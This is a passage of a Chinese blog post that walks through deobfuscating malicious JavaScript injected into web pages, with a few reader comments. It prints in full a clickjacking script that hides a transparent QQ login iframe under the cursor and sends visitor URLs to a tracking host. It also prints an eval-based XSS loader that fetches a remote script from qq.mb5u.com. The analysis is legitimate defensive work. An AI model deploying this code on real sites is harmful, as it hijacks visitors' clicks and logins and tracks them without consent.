x3D\x26\x63\x62\x3D\x62\x69\x7A\x71\x71\x6B\x65\x79\x35\x75″,"\x26\x61\x6D\x70\x3B","\x26″,"\x73\x69\x67\x6E","\x2F","\x71\x71\x63\x68\x61\x74\x35\x75\x32″,"\x69\x6E\x64\x65\x78\x4F\x66″,"\x64\x6F\x6D\x61\x69\x6E","\x71\x71\x63\x68\x61\x74\x35\x75\x28\x31\x29″,"\x32″,"\x71\x71\x63\x68\x61\x74\x35\x75\x28\x29″];var mb5u_oHead=document[_0xc112[2]](_0xc112[1])[_0xc112[0]](0);var mb5ux=0;var mb5uy=0;var mb5u_iframe_hover=false;var i_referrer=encodeURIComponent(document[_0xc112[3]]);var i_url=encodeURIComponent(document[_0xc112[5]][_0xc112[4]]);var i_title=encodeURIComponent(document[_0xc112[6]]);function Creatif5u(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);mb5u_oHead[_0xc112[20]](a)}function Creatjs5u(b,c){var a=document[_0xc112[8]](_0xc112[21]);a[_0xc112[22]]=_0xc112[23];if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[24]]=_0xc112[25];a[_0xc112[9]]=b;mb5u_oHead[_0xc112[20]](a)}function Creatif5ubody(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);document[_0xc112[2]](_0xc112[26])[_0xc112[0]](0)[_0xc112[20]](a)}function Gc5u(a){var b,reg=new RegExp(_0xc112[27]+a+_0xc112[28]);if(b=document[_0xc112[30]][_0xc112[29]](reg)){return unescape(b[2])}else{return null}}function Sc5u(a,b){var c=new Date();c[_0xc112[32]](c[_0xc112[31]]()+2*24*60*60*1000);document[_0xc112[30]]=a+_0xc112[33]+escape(b)+_0xc112[34]+c[_0xc112[35]]()}function Q5u(){var a=i_php+_0xc112[36]+i_uid+_0xc112[37]+i_qz+_0xc112[38]+i_time+_0xc112[39]+i_referrer+_0xc112[40]+i_url+_0xc112[41]+i_title+_0xc112[42]+(new Date())[_0xc112[31]]();Creatjs5u(a,_0xc112[43])}function Umb5u(){var a=i_php+_0xc112[44]+i_uid+_0xc112[45]+i_referrer+_0xc112[46]+i_url+_0xc112[41]+i_title+_0xc112[47]+i_fkid+_0xc112[48]+(new Date())[_0xc112[31]]();Creatif5u(a)}function mb5u_noLogin(){var a=i_php+_0xc112[49]+i_fkid+_0xc112[50]+(new Date)[_0xc112[31]]();Creatjs5u(a);setTimeout(ck5u,500)}function ck5u(){if(wdl==_0xc112[51]){if(!navigator[_0xc112[52]][_0xc112[29]](/(iPhone|iPod|Android|ios)/i)){if(Gc5u(_0xc112[53])==null){ptU5u()}}}}function ptU5u(){window[_0xc112[54]]=_0xc112[55];var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=_0xc112[56];a[_0xc112[11]]=_0xc112[54];a[_0xc112[13]][_0xc112[12]]=_0xc112[57];a[_0xc112[15]]=_0xc112[16];a[_0xc112[58]]=_0xc112[59];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);var b=document[_0xc112[61]][_0xc112[60]];document[_0xc112[61]][_0xc112[62]](a,b)}function mb5u_GetCurrentStyle(a,b){if(a[_0xc112[63]]){return a[_0xc112[63]][b]}else{if(window[_0xc112[64]]){propprop=b[_0xc112[66]](/([A-Z])/g,_0xc112[65]);propprop=b[_0xc112[67]]();return document[_0xc112[68]][_0xc112[64]](a,null)[propprop]}};return null}window[_0xc112[69]]=function(){var h=document[_0xc112[70]](_0xc112[54]);mb5u_iframeClick(h,mb5uiframeclickcallback);document[_0xc112[71]]=function(a){mb5u_iframe_hover=false;window[_0xc112[72]]();var b=document[_0xc112[70]](_0xc112[54]);var a=a||window[_0xc112[73]];mb5ux=a[_0xc112[74]];mb5ux=a[_0xc112[75]];var c=document[_0xc112[61]][_0xc112[76]]+document[_0xc112[77]][_0xc112[76]];var d=document[_0xc112[77]][_0xc112[78]]-a[_0xc112[74]];var e=document[_0xc112[61]][_0xc112[79]]+document[_0xc112[77]][_0xc112[79]];var f=0;var g=mb5u_GetCurrentStyle(document[_0xc112[61]],_0xc112[80]);if(document[_0xc112[77]][_0xc112[81]]>document[_0xc112[61]][_0xc112[81]]&&g==_0xc112[82]){f=(document[_0xc112[77]][_0xc112[81]]-document[_0xc112[61]][_0xc112[81]])/2;f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])-f)+_0xc112[84]}else{f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])+f)+_0xc112[84]}}};function mb5u_iframeClick(a,b){a[_0xc112[86]]=function(){mb5u_iframe_hover=true};a[_0xc112[87]]=function(){mb5u_iframe_hover=false};window[_0xc112[88]]=function(){if(mb5u_iframe_hover){b()}}}function mb5uiframeclickcallback(){var b=document[_0xc112[70]](_0xc112[54]);setTimeout(function(){try{b[_0xc112[13]][_0xc112[89]]=_0xc112[90];var a=document[_0xc112[91]](mb5ux,mb5uy);a[_0xc112[92]]()}catch(e){b[_0xc112[13]][_0xc112[89]]=_0xc112[90]};Umb5u();Sc5u(_0xc112[53],_0xc112[93])},1000)}function qqchat5u(i){if(i==1){var a=_0xc112[94]+i_qq+_0xc112[95]+i_d+_0xc112[96];Creatif5ubody(a,_0xc112[97])}else{Creatjs5u(_0xc112[98]+i_qq+_0xc112[99],_0xc112[100])}}function JSONP_CALLBACK_5u(a){var b=a[_0xc112[102]][_0xc112[101]];Creatjs5u(_0xc112[103]+i_qq+_0xc112[104]+b+_0xc112[105]+i_url+_0xc112[41]+i_title+_0xc112[106],_0xc112[100])}function bizqqkey5u(a){var b=a[_0xc112[102]][_0xc112[109]][_0xc112[66]](_0xc112[107],_0xc112[108]);b=b[_0xc112[66]](_0xc112[110],_0xc112[110]);Creatif5ubody(b,_0xc112[111])}if(document[_0xc112[113]][_0xc112[112]](i_d)>=0){Umb5u();setTimeout(mb5u_noLogin,1500);if(i_h==_0xc112[93]){setTimeout(_0xc112[114],i_yc)};if(i_h==_0xc112[115]){setTimeout(_0xc112[116],i_yc)}};

这种代码看起来还是很复杂。但不要怕,因为这里属于另外一种混淆形式,使用的是javascript的一种语言机制。

对于javascript来说,取一个对象的属性有两种方式,一种是直接引用,比如 document.style.display;一种是集合引用,比如 document["style"]["display"]。对于javascript来说,这两种方法是等效的。

因此这种混淆方法的做法是,先把属性调用全部改写成集合引用,然后把所有的属性名字符串全部提取出来,放到一个大数组里面。当要使用的时候,就使用数组下标来引用对应的名字。

知道其混淆方法的话,反混淆就会很简单了。提取前面的大数组,使用eval获得内容,然后再做变量替换,把所有的数组引用还原为字符串就OK了。

此部分反混淆代码如下。

arraydefunction (str) {
	var varData = /^var\s*([a-z_\d]+)\s*=\s*(\[.*?\])/i.exec(str);
	var varName = varData[1];
	var varValue = eval(varData[2]);
 
	str = str.replace(varData[0]"");
	return str.replace(new RegExp(varName + "\\s*\\[(\\d+)\\]""gi")function ($0, $1) {
		var value = varValue[parseInt($1)];
		if (typeof (value) === "number")
			return value;
 
		return "'" + value.replace(/'/g'\\\'') + "'";
	});
},

最终得到结果如下,这里已经是压缩的源码了,格式化即可。至此,演示1反混淆完成。

;var mb5u_oHead=document["getElementsByTagName"]("HEAD")["item"](0);var mb5ux=0;var mb5uy=0;var mb5u_iframe_hover=false;var i_referrer=encodeURIComponent(document["referrer"]);var i_url=encodeURIComponent(document["location"]["href"]);var i_title=encodeURIComponent(document["title"]);function Creatif5u(b,c){var a=document["createElement"]("iframe");a["src"]=b;if(c!=""&&c!=null){a["id"]=c};a["style"]["cssText"]="width:0px;height:0px;display:none;";a["scrolling"]="no";a["setAttribute"]("frameborder","0″,0);mb5u_oHead["appendChild"](a)}function Creatjs5u(b,c){var a=document["createElement"]("script");a["type"]="text/javascript";if(c!=""&&c!=null){a["id"]=c};a["charset"]="utf-8″;a["src"]=b;mb5u_oHead["appendChild"](a)}function Creatif5ubody(b,c){var a=document["createElement"]("iframe");a["src"]=b;if(c!=""&&c!=null){a["id"]=c};a["style"]["cssText"]="width:0px;height:0px;display:none;";a["scrolling"]="no";a["setAttribute"]("frameborder","0″,0);document["getElementsByTagName"]("BODY")["item"](0)["appendChild"](a)}function Gc5u(a){var b,reg=new RegExp("(^| )"+a+"=([^;]*)(;|$)");if(b=document["cookie"]["match"](reg)){return unescape(b[2])}else{return null}}function Sc5u(a,b){var c=new Date();c["setTime"](c["getTime"]()+2*24*60*60*1000);document["cookie"]=a+"="+escape(b)+";expires="+c["toGMTString"]()}function Q5u(){var a=i_php+"?action=saveQQ&uid="+i_uid+"&qz="+i_qz+"&time="+i_time+"&referrer="+i_referrer+"&url="+i_url+"&title="+i_title+"&r="+(new Date())["getTime"]();Creatjs5u(a,"smevn5du")}function Umb5u(){var a=i_php+"/sx.php?uid="+i_uid+"&ref="+i_referrer+"&furl="+i_url+"&title="+i_title+"&fkid="+i_fkid+"&tm="+(new Date())["getTime"]();Creatif5u(a)}function mb5u_noLogin(){var a=i_php+"/m/wdl.php?c="+i_fkid+"&r=1&time="+(new Date)["getTime"]();Creatjs5u(a);setTimeout(ck5u,500)}function ck5u(){if(wdl=="Y"){if(!navigator["userAgent"]["match"](/(iPhone|iPod|Android|ios)/i)){if(Gc5u("ifptu5u")==null){ptU5u()}}}}function ptU5u(){window["mb5uptlogin"]="<iframe style="position:absolute;width:580px;height:366px; margin:-150px 0 0 -340px;filter:alpha(opacity=00);-moz-opacity:0.0;-khtml-opacity: 0.0;opacity: 0.0;" scrolling="no" name="mb5u" id="mb5uptlogin" src="http://ui.ptlogin2.qq.com/cgi-bin/login?link_target=blank&target=blank&appid=6000201&daid=220&hide_uin_tip=1&style=11&hide_close_icon=1&target=self&qtarget=0&hide_title_bar=1&s_url=http%3A%2F%2Fapp.data.qq.com%2Fcate%2FpopLogin" frameborder="0″ onload="setTimeout(top.mb5u_ifmove,0);">";var a=document["createElement"]("iframe");a["src"]="javascript:parent.mb5uptlogin";a["id"]="mb5uptlogin";a["style"]["cssText"]="position:absolute; z-index: 2147483647;width:50px; height:50px; ";a["scrolling"]="no";a["onerror"]="return true;";a["setAttribute"]("frameborder","0″,0);var b=document["body"]["firstChild"];document["body"]["insertBefore"](a,b)}function mb5u_GetCurrentStyle(a,b){if(a["currentStyle"]){return a["currentStyle"][b]}else{if(window["getComputedStyle"]){propprop=b["replace"](/([A-Z])/g,"-$1″);propprop=b["toLowerCase"]();return document["defaultView"]["getComputedStyle"](a,null)[propprop]}};return null}window["mb5u_ifmove"]=function(){var h=document["getElementById"]("mb5uptlogin");mb5u_iframeClick(h,mb5uiframeclickcallback);document["onmousemove"]=function(a){mb5u_iframe_hover=false;window["focus"]();var b=document["getElementById"]("mb5uptlogin");var a=a||window["event"];mb5ux=a["clientX"];mb5ux=a["clientY"];var c=document["body"]["scrollTop"]+document["documentElement"]["scrollTop"];var d=document["documentElement"]["offsetWidth"]-a["clientX"];var e=document["body"]["scrollLeft"]+document["documentElement"]["scrollLeft"];var f=0;var g=mb5u_GetCurrentStyle(document["body"],"position");if(document["documentElement"]["clientWidth"]>document["body"]["clientWidth"]&&g=="relative"){f=(document["documentElement"]["clientWidth"]-document["body"]["clientWidth"])/2;f=f+e;b["style"]["top"]=(c+a["clientY"]-25)+"px";b["style"]["left"]=((d<b["offsetWidth"]?a["clientX"]-b["offsetWidth"]:a["clientX"])-f)+"px"}else{f=f+e;b["style"]["top"]=(c+a["clientY"]-25)+"px";b["style"]["left"]=((d<b["offsetWidth"]?a["clientX"]-b["offsetWidth"]:a["clientX"])+f)+"px"}}};function mb5u_iframeClick(a,b){a["onmouseover"]=function(){mb5u_iframe_hover=true};a["onmouseout"]=function(){mb5u_iframe_hover=false};window["onblur"]=function(){if(mb5u_iframe_hover){b()}}}function mb5uiframeclickcallback(){var b=document["getElementById"]("mb5uptlogin");setTimeout(function(){try{b["style"]["display"]="none";var a=document["elementFromPoint"](mb5ux,mb5uy);a["click"]()}catch(e){b["style"]["display"]="none"};Umb5u();Sc5u("ifptu5u","1″)},1000)}function qqchat5u(i){if(i==1){var a="tencent://message/?uin="+i_qq+"&Site="+i_d+"&Menu=yes";Creatif5ubody(a,"qqchat5u1″)}else{Creatjs5u("http://wpl.b.qq.com/cgi/conv.php?num="+i_qq+"&cb=JSONP_CALLBACK_5u","bizqqkey")}}function JSONP_CALLBACK_5u(a){var b=a["data"]["kfuin"];Creatjs5u("http://wpd.b.qq.com/cgi/get_sign.php?na="+i_qq+"&kfuin="+b+"&aty=0&a=0&sid=&uid=&url="+i_url+"&title="+i_title+"&dm=&clkSrc=&ext=&cb=bizqqkey5u","bizqqkey")}function bizqqkey5u(a){var b=a["data"]["sign"]["replace"]("&amp;","&");b=b["replace"]("/","/");Creatif5ubody(b,"qqchat5u2″)}if(document["domain"]["indexOf"](i_d)>=0){Umb5u();setTimeout(mb5u_noLogin,1500);if(i_h=="1″){setTimeout("qqchat5u(1)",i_yc)};if(i_h=="2″){setTimeout("qqchat5u()",i_yc)}};

注意:此处的代码不一定可以运行,因为中间涉及到字符串的定界符。由于此处并非为了运行,所以演示脚本处理得比较简单,有兴趣的同学可以在遇到问题时自己尝试完善下。

3.第二个脚本演示

第二个脚本是被注入搜狗缓存快照页面并最终触发XSS的脚本,原脚本如下。

/*_Ka*/var/*hCnn*/IHse/*Wav*/=/*fBJAp*/\u0053\u0074\u0072\u0069\u006e\u0067./*lsxIcC*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ksHMx*/var/*KuVkYP*/NWVbw_QY/*_ztkzYy*/=/*_pNZE*/\u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));

一般来说,要实现XSS,并防止被过滤等等,需要精巧地构造攻击字符串,而此字符串就是精心构造的。在这个字符串中,充斥着大量的注释 /*….*/ ,这注释就是混淆视线的同时还可以当空格使用……

所以第一步,干掉空格。

commentremovealfunction (str) {
	return str.replace(/\/\*.*?\*\//g" ");
}

移除这些注释并替换为空格后,代码如下。

 var IHse = \u0053\u0074\u0072\u0069\u006e\u0067. \u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065; var NWVbw_QY = \u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));

好吧……还存在大量的实体字符引用。不过这个好办,转换成对应字符即可。

revokeCharfunction (str) {
	str = str.replace(/\\x([\da-f]{2})/gifunction (a, b) { return String.fromCharCode(parseInt(b, 16)) })
	str = str.replace(/\\u([\da-f]{4})/gifunction (a, b) { return String.fromCharCode(parseInt(b, 16)) });
 
	return str;
}

最终我们看到的是这样的。

 var IHse = String. fromCharCode; var NWVbw_QY = eval;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));

这样我们就看得很清楚了。这里先用俩随机的字符串给String.fromCharCode以及eval起个别名,再通过还原一堆ASCII字符生成目标字符串,最终通过eval再次执行。果然还是要依赖eval啊。

既然还是用的eval,那么之前对付packer的思路也可以用,但需要修改一点形式。所以我们可以考虑直接点,取所有数据后直接生成脚本。

rebuildstrfunction (str) {
	return String.fromCharCode.apply(thiseval("[" + /\(([\d\,\s]+)\)/.exec(str)[1] + "]"));
}

思路是获得ASCII数组字符串后,套上数组标记用eval获得数组,最终通过String.fromCharCode.apply获得结果。解密结果如下。

var oHead=document.getElementsByTagName('HEAD').item(0);var oScript= document.createElement("script");oScript.type="text/javascript";oScript.src="http://qq.mb5u.com/qq.js";oHead.appendChild(oScript);

引用一个脚本而已。

4.第三个脚本演示

……额。第三个脚本仅仅用了Packer加密,就不在多废话了。

喜欢 (22)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(3)个小伙伴在吐槽
  1. 真心牛逼

    moface2017-04-07 18:43 回复
  2. eval加密解密的网上有现成的在线工具,倒是字符串替换的那个有点坑爹,小米抢购的之前就是这么弄的,不过小米的还加了混淆,各种替换变量…

    2015-05-14 07:29 回复
    • 顺便说下,我当年就是为了个小米做斗争才认真学的原生js…

      2015-05-14 07:35 回复